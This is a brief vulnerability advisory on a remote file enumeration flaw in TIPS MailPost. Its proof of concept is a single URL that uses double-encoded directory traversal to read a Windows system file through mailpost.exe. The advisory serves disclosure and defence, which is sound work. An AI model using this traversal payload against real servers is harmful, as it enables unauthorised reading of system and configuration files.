TIPS MailPost Remote File Enumeration Vulnerability

TIPS MailPost Remote File Enumeration Vulnerability

No exploit is required to leverage this issue. The following proof of concet has been provided:

http://www.example.com/scripts/mailpost.exe/..%255c..%255c..%255cwinnt/system.ini?*nosend*=&email=test@procheckup.com